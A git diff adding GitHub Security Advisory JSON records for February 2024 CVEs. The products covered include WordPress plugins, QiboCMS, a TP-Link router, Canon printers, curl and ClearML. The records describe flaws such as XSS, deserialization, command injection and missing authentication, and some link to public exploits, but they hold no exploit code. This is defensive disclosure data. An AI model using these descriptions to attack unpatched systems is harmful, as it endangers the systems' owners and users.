b/advisories/unreviewed/2024/02/GHSA-5qw4-2v86-45mw/GHSA-5qw4-2v86-45mw.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qw4-2v86-45mw", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6959" + ], + "details": "The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the recaptcha_api_key_manage function in all versions up to, and including, 2.0.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete the 'Recaptcha Site Key' and 'Recaptcha Secret Key' settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6959" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3022982" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/774c00fb-82cd-44ca-bf96-3f6dfd1977d0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5rfj-4v26-hqmw/GHSA-5rfj-4v26-hqmw.json b/advisories/unreviewed/2024/02/GHSA-5rfj-4v26-hqmw/GHSA-5rfj-4v26-hqmw.json new file mode 100644 index 0000000000000..77306390b8796 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5rfj-4v26-hqmw/GHSA-5rfj-4v26-hqmw.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rfj-4v26-hqmw", + "modified": "2024-02-05T15:30:23Z", + "published": "2024-02-05T15:30:23Z", + "aliases": [ + "CVE-2024-1225" + ], + "details": "A vulnerability classified as critical was found in QiboSoft QiboCMS X1 up to 1.0.6. Affected by this vulnerability is the function rmb_pay of the file /application/index/controller/Pay.php. The manipulation of the argument callback_class leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252847. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1225" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/jDWk6INLzO12" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252847" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252847" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5rhg-f75j-57f8/GHSA-5rhg-f75j-57f8.json b/advisories/unreviewed/2024/02/GHSA-5rhg-f75j-57f8/GHSA-5rhg-f75j-57f8.json new file mode 100644 index 0000000000000..7a222ec61d3a5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5rhg-f75j-57f8/GHSA-5rhg-f75j-57f8.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5rhg-f75j-57f8", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-01T06:31:05Z", + "aliases": [ + "CVE-2024-23941" + ], + "details": "Cross-site scripting vulnerability exists in Group Office prior to v6.6.182, prior to v6.7.64 and prior to v6.8.31, which may allow a remote authenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23941" + }, + { + "type": "WEB", + "url": "https://github.com/Intermesh/groupoffice/" + }, + { + "type": "WEB", + "url": "https://jvn.jp/en/jp/JVN63567545/" + }, + { + "type": "WEB", + "url": "https://www.group-office.com/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T04:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json b/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json new file mode 100644 index 0000000000000..14811b067a8a8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-5v8x-xh64-m4xp/GHSA-5v8x-xh64-m4xp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5v8x-xh64-m4xp", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24855" + ], + "details": "A race condition was found in the Linux kernel's scsi device driver in lpfc_unregister_fcf_rescan() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24855" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8149" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-62qv-qwj7-9q6x/GHSA-62qv-qwj7-9q6x.json b/advisories/unreviewed/2024/02/GHSA-62qv-qwj7-9q6x/GHSA-62qv-qwj7-9q6x.json new file mode 100644 index 0000000000000..99ad87e94c865 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-62qv-qwj7-9q6x/GHSA-62qv-qwj7-9q6x.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-62qv-qwj7-9q6x", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-46683" + ], + "details": "A post authentication command injection vulnerability exists when configuring the wireguard VPN functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection . An attacker can make an authenticated HTTP request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46683" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1857" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-63cq-gvxf-cpjp/GHSA-63cq-gvxf-cpjp.json b/advisories/unreviewed/2024/02/GHSA-63cq-gvxf-cpjp/GHSA-63cq-gvxf-cpjp.json new file mode 100644 index 0000000000000..16eacf2804c78 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-63cq-gvxf-cpjp/GHSA-63cq-gvxf-cpjp.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-63cq-gvxf-cpjp", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-1187" + ], + "details": "A vulnerability, which was classified as problematic, has been found in Munsoft Easy Outlook Express Recovery 2.0. This issue affects some unknown processing of the component Registration Key Handler. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252677 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1187" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/13-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252677" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252677" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T18:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-65v7-6rgc-6f27/GHSA-65v7-6rgc-6f27.json b/advisories/unreviewed/2024/02/GHSA-65v7-6rgc-6f27/GHSA-65v7-6rgc-6f27.json new file mode 100644 index 0000000000000..4b33058f9b6a4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-65v7-6rgc-6f27/GHSA-65v7-6rgc-6f27.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-65v7-6rgc-6f27", + "modified": "2024-02-01T12:30:21Z", + "published": "2024-02-01T12:30:21Z", + "aliases": [ + "CVE-2023-52189" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jhayghost Ideal Interactive Map allows Stored XSS.This issue affects Ideal Interactive Map: from n/a through 1.2.4.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52189" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/ideal-interactive-map/wordpress-ideal-interactive-map-plugin-1-2-4-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-66qc-rgfw-8hq2/GHSA-66qc-rgfw-8hq2.json b/advisories/unreviewed/2024/02/GHSA-66qc-rgfw-8hq2/GHSA-66qc-rgfw-8hq2.json new file mode 100644 index 0000000000000..41d0a065e1fe6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-66qc-rgfw-8hq2/GHSA-66qc-rgfw-8hq2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-66qc-rgfw-8hq2", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51691" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in gVectors Team Comments – wpDiscuz allows Stored XSS.This issue affects Comments – wpDiscuz: from n/a through 7.6.12.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51691" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/wpdiscuz/wordpress-wpdiscuz-plugin-7-6-12-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-67ph-hcx9-mvwp/GHSA-67ph-hcx9-mvwp.json b/advisories/unreviewed/2024/02/GHSA-67ph-hcx9-mvwp/GHSA-67ph-hcx9-mvwp.json new file mode 100644 index 0000000000000..2c48cbc142e0d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-67ph-hcx9-mvwp/GHSA-67ph-hcx9-mvwp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-67ph-hcx9-mvwp", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24841" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dan's Art Add Customer for WooCommerce allows Stored XSS.This issue affects Add Customer for WooCommerce: from n/a through 1.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24841" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/add-customer-for-woocommerce/wordpress-add-customer-for-woocommerce-plugin-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-682p-65cm-q45c/GHSA-682p-65cm-q45c.json b/advisories/unreviewed/2024/02/GHSA-682p-65cm-q45c/GHSA-682p-65cm-q45c.json new file mode 100644 index 0000000000000..687bd4ff88a1c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-682p-65cm-q45c/GHSA-682p-65cm-q45c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-682p-65cm-q45c", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41278" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41278" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-68pq-vjfc-wpgv/GHSA-68pq-vjfc-wpgv.json b/advisories/unreviewed/2024/02/GHSA-68pq-vjfc-wpgv/GHSA-68pq-vjfc-wpgv.json new file mode 100644 index 0000000000000..8319f956f4aee --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-68pq-vjfc-wpgv/GHSA-68pq-vjfc-wpgv.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-68pq-vjfc-wpgv", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50962" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 MFA does not implement the \"HTTP Strict Transport Security\" (HSTS) web security policy mechanism. IBM X-Force ID: 276004.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50962" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/276004" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json b/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json new file mode 100644 index 0000000000000..d65f812d36ba1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-68qx-6vr4-qq4p", + "modified": "2024-02-07T12:30:26Z", + "published": "2024-02-07T12:30:26Z", + "aliases": [ + "CVE-2024-1110" + ], + "details": "The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init() function in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to import the plugin's settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1110" + }, + { + "type": "WEB", + "url": "https://github.com/podlove/podlove-publisher/commit/7873ff520631087e2f10737860cdcd64d53187ba" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T11:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-68r4-mq9j-2rrq/GHSA-68r4-mq9j-2rrq.json b/advisories/unreviewed/2024/02/GHSA-68r4-mq9j-2rrq/GHSA-68r4-mq9j-2rrq.json new file mode 100644 index 0000000000000..d4d40187b801e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-68r4-mq9j-2rrq/GHSA-68r4-mq9j-2rrq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-68r4-mq9j-2rrq", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20810" + ], + "details": "Implicit intent hijacking vulnerability in Smart Suggestions prior to SMR Feb-2024 Release 1 allows attackers to get sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20810" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-694p-hcfm-p8q8/GHSA-694p-hcfm-p8q8.json b/advisories/unreviewed/2024/02/GHSA-694p-hcfm-p8q8/GHSA-694p-hcfm-p8q8.json new file mode 100644 index 0000000000000..e8eb2743fc847 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-694p-hcfm-p8q8/GHSA-694p-hcfm-p8q8.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-694p-hcfm-p8q8", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2023-6230" + ], + "details": "Buffer overflow in the Address Book password process in authentication of Mobile Device Function of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6230" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-697h-9h25-w4fm/GHSA-697h-9h25-w4fm.json b/advisories/unreviewed/2024/02/GHSA-697h-9h25-w4fm/GHSA-697h-9h25-w4fm.json new file mode 100644 index 0000000000000..73589ff0bc817 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-697h-9h25-w4fm/GHSA-697h-9h25-w4fm.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-697h-9h25-w4fm", + "modified": "2024-02-03T15:30:28Z", + "published": "2024-02-03T15:30:28Z", + "aliases": [ + "CVE-2024-0853" + ], + "details": "curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer to\nthe same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0853" + }, + { + "type": "WEB", + "url": "https://hackerone.com/reports/2298922" + }, + { + "type": "WEB", + "url": "https://curl.se/docs/CVE-2024-0853.html" + }, + { + "type": "WEB", + "url": "https://curl.se/docs/CVE-2024-0853.json" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T14:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6c6r-r3r9-h62j/GHSA-6c6r-r3r9-h62j.json b/advisories/unreviewed/2024/02/GHSA-6c6r-r3r9-h62j/GHSA-6c6r-r3r9-h62j.json new file mode 100644 index 0000000000000..61f5ca91084ff --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6c6r-r3r9-h62j/GHSA-6c6r-r3r9-h62j.json @@ -0,0 +1,58 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6c6r-r3r9-h62j", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-4503" + ], + "details": "An improper initialization vulnerability was found in Galleon. When using Galleon to provision custom EAP or EAP-XP servers, the servers are created unsecured. This issue could allow an attacker to access remote HTTP services available from the server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4503" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2023:7637" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2023:7638" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2023:7639" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2023:7641" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-4503" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2184751" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-665" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T09:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6cj6-cwf2-xhf2/GHSA-6cj6-cwf2-xhf2.json b/advisories/unreviewed/2024/02/GHSA-6cj6-cwf2-xhf2/GHSA-6cj6-cwf2-xhf2.json new file mode 100644 index 0000000000000..f807d6a3bf32e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6cj6-cwf2-xhf2/GHSA-6cj6-cwf2-xhf2.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6cj6-cwf2-xhf2", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2023-40355" + ], + "details": "Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40355" + }, + { + "type": "WEB", + "url": "https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T08:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6f2h-vg2p-qhf2/GHSA-6f2h-vg2p-qhf2.json b/advisories/unreviewed/2024/02/GHSA-6f2h-vg2p-qhf2/GHSA-6f2h-vg2p-qhf2.json new file mode 100644 index 0000000000000..a1408ab8bb6f7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6f2h-vg2p-qhf2/GHSA-6f2h-vg2p-qhf2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6f2h-vg2p-qhf2", + "modified": "2024-02-03T06:30:24Z", + "published": "2024-02-03T06:30:24Z", + "aliases": [ + "CVE-2024-23550" + ], + "details": "HCL DevOps Deploy / HCL Launch (UCD) could disclose sensitive user information when installing the Windows agent.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23550" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110334" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T06:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-6g66-738j-p78c/GHSA-6g66-738j-p78c.json b/advisories/unreviewed/2024/02/GHSA-6g66-738j-p78c/GHSA-6g66-738j-p78c.json new file mode 100644 index 0000000000000..1a0605a1073a1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-6g66-738j-p78c/GHSA-6g66-738j-p78c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6g66-738j-p78c", + "modified": "2024-02-06T15:32:08Z", + "published": "2024-02-06T15:32:08Z", + "aliases": [ + "CVE-2024-24592" + ], + "details": "Lack of authentication in all versions of the fileserver component of Allegro AI’s ClearML platform allows a remote attacker to arbitrarily access, create, modify and delete files. \n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24592" + }, + { + "type": "WEB", + "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-425" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T15:15:09Z" + } +} \ No newline at end of file diff --git 